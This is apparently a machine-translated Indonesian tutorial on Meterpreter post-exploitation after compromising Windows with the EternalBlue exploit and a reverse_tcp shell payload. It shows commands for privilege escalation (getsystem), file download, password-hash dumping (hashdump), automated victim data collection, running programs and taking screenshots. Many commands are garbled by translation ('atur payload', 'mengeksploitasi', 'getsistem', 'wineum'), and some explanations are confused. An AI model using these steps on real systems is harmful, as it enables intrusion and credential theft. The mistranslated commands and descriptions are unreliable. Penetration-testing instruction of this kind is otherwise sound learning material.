metasploit

Pasca eksploitasi dengan Meterpreter

Pasca eksploitasi dengan Meterpreter
Ini adalah pengantar plugin payload Meterpreter dalam Metasploit. Dalam tutorial singkat ini, kita akan membahas cara menggunakannya untuk menerapkan pasca eksploitasi ke sistem OS WINDOWS setelah Anda melanggarnya menggunakan eksploitasi Eternalblue. Kami akan membatasi diri untuk mengakses sistem windows dan menjelajahinya, dan semua hal yang akan kami lakukan akan fokus pada mengakses informasi dan kredensial pengguna.

Pengantar Meterpreter

Meterpreter adalah muatan serangan dalam kerangka Metasploit yang memungkinkan pelaku mengontrol dan menavigasi komputer korban melalui shell perintah. Ini terbukti menjadi alat yang sangat serbaguna dalam hal pengujian penetrasi.  Ini adalah alat pasca-eksploitasi yang didasarkan pada injeksi DLL dalam memori, yang berarti itu membuat DLL yang disuntikkan berjalan dengan membuat proses baru yang memanggil sistem untuk menjalankan DLL yang disuntikkan. Ini dapat memberi Anda akses ke shell perintah yang tidak terlihat pada mesin korban, memungkinkan Anda menjalankan executable dan jaringan profil.

Ini awalnya ditulis untuk Metasploit 2.x dan ditingkatkan untuk Metasploit 3.

Kami akan membahas penggunaan Meterpreter secara rinci, tetapi sebelum itu, mari kita bicara tentang muatan secara umum

Apa itu muatan??

Payload di Metasploit adalah modul, artinya mereka adalah potongan kode dalam Metasploit yang berjalan di sistem jarak jauh yang kami targetkan. Modul exploit dikirim terlebih dahulu, yang menginstal modul payload pada sistem. Kemudian payload memberikan akses ke penyerang (terbatas atau penuh, tergantung pada konten payload). Untuk menguraikan lebih lanjut tentang fungsi muatan, kita harus membahas jenisnya, yang ada 3 total:

Single

Muatan ini sepenuhnya mandiri, yang berarti bahwa ini dapat menjadi dasar seperti kode penjaga gerbang yang memungkinkan pengguna masuk ke sistem target.

Stagers

Stagers adalah muatan yang mengumpulkan aplikasi dalam sistem target dan mengirimkannya ke penyerang. Ini membuat koneksi antara korban ke mesin lokal kami.

Tahapan

Setelah stager memiliki akses ke sistem, mereka mendownload modul stage. Modul tahapan menghapus batas ukuran pada meterpreter.

Contoh tahapannya adalah cangkang sederhana, cangkang iPhone 'ipwn', modul Meterpreter, Injeksi VNC.

Anda dapat mengetahui jenis muatan dengan mencari tahu namanya. Muatan tunggal biasanya dalam format /

Eksploitasi dengan Meterpreter

Pertama-tama, mulai konsol msf dengan mengetikkan perintah terminal berikut di jendela terminal Kali.

$ sudo msfconsole

Kami menggunakan reverse_tcp sebagai stager dan Meterpreter sebagai stage.

Kami akan mulai dengan menyiapkan exploit Eternal Blue. Pilih (ms17_010_eternalblue) lalu atur windows/x64/meterpreter/reverse_tcp sebagai payload yang dipilih

Selanjutnya, konfigurasikan pengaturan exploit kemudian jalankan exploit dengan perintah exploit:

$ atur payload windows/x64/meterpreter/reverse_tcp
$ setel rhost 192.168.198.136
$ mengeksploitasi

Itu Eksploitasi Eternalblue telah berhasil diaktifkan.

Pasca eksploitasi

Kami mengakses dan memanipulasi sistem yang sudah dikompromikan selama pasca-eksploitasi.

Kami dapat melakukan banyak hal sekarang karena kami memiliki akses ke sistem, tetapi seperti yang disebutkan di atas, kami harus tetap fokus terutama pada mengunduh informasi dan mendapatkan kredensial pengguna di sini

Mengelola hak akses:

Bergantung pada modul muatan dan eksploitasi yang Anda gunakan, Anda mungkin dihadapkan pada pembatasan akses tertentu yang akan sangat melumpuhkan kemampuan Anda untuk menggerakkan mesin korban. Anda dapat mengatasi masalah ini dengan eskalasi hak istimewa melalui menghapus kata sandi dan merusak pendaftar. Anda juga dapat meningkatkan hak istimewa dengan menggunakan sistem get Meterpreter -commandcom.

$ getsistem
$ getuid

Transfer file dengan Meterpreter

Dengan Meterpreter, Anda dapat mengunduh file menggunakan perintah $download-.

$ unduh /windows/system32/drivers/etc/hosts

Demikian pula, Anda juga dapat mengunggah informasi ke mesin, menggunakan $upload- command

Mengekstrak Kredensial Pengguna:

Gunakan skrip kode credential_collector untuk mengekstrak informasi akun pengguna, atau gunakan modul posting dump hash untuk efek serupa.

Kami akan menggunakan modul posting dump hash untuk melanjutkan dengan memanen kredensial. Ketik perintah msf berikut:.

$ jalankan posting/windows/gather/hashdump

Seperti yang kita lihat, kita telah memperoleh akun Coen, guest, dan admin. Hash LM (admin) dan hash NTLM (tamu) berkaitan dengan kata sandi kosong, sedangkan hash Coen adalah kata sandi yang harus Anda pecahkan. Anda dapat melakukannya dengan menggunakan cracker kata sandi.

Mengotomatiskan pengikisan sistem

Mungkin membosankan untuk mengumpulkan informasi dengan pernyataan input individual bahwa Anda harus terus memberi makan shell perintah. Dengan mudah, Anda dapat mengotomatiskan proses ini dengan skrip vineum. Script mengumpulkan informasi dari korban dan mengunduh data ke mesin lokal kami. Anda akan diberi tahu di mana output disimpan, seperti yang Anda lihat di baris keempat dari atas:

$ menjalankan wineum

Perlu diingat bahwa jalur tempat output ke setiap perintah disimpan mungkin berbeda dari yang ditampilkan di sini.

Mari main-main sedikit lagi

Menjalankan file

Anda dapat menjalankan file apa pun di sistem dengan menggunakan: execute -f . Ini termasuk file yang dapat dieksekusi dan program dengan banyak file pendukung. Misalnya, untuk menjalankan aplikasi kalkulator bawaan di os windows, ketik execute -f calc.exe

Mengambil tangkapan layar

Anda juga dapat menangkap tangkapan layar dari sudut pandang pengguna. Cukup ketik tangkapan layar di shell perintah Meterpreter, dan Anda akan mendapatkan tangkapan layar dari tampilan di sistem.

$ jalankan -f kalkulasi.exe
$ tangkapan layar

Kesimpulan:

Ini telah menjadi pengantar singkat untuk plugin Meterpreter dalam kerangka Metasploit, bersama dengan panduan singkat yang menunjukkan kegunaannya yang paling mendasar. Kami telah mempelajari di sini bagaimana kami dapat menembus sistem OS Windows dengan exploit Eternalblue untuk mendapatkan akses,  kemudian menggunakan Meterpreter untuk mengeskalasi hak istimewa, mengumpulkan informasi secara manual, dan dengan perintah vineus- otomatis. Kami juga telah mempelajari cara mengeksekusi file di mesin korban.

Meterpreter dapat berfungsi sebagai sarana deteksi kerentanan yang cukup baik, meskipun merupakan kumpulan alat dasar dalam kerangka Metasploit.

Petakan ulang tombol mouse Anda secara berbeda untuk perangkat lunak yang berbeda dengan Kontrol Tombol X-Mouse
Mungkin Anda membutuhkan alat yang dapat membuat kontrol mouse Anda berubah dengan setiap aplikasi yang Anda gunakan. Jika demikian, Anda dapat mencob...
Ulasan Mouse Nirkabel Microsoft Sculpt Touch
Saya baru-baru ini membaca tentang Microsoft Sculpt Touch mouse nirkabel dan memutuskan untuk membelinya. Setelah menggunakannya untuk sementara waktu...
Trackpad dan Mouse Pointer di Layar AppyMouse untuk Tablet Windows
Pengguna tablet sering melewatkan penunjuk mouse, terutama ketika mereka terbiasa menggunakan laptop. Layar sentuh Smartphone dan tablet hadir dengan ...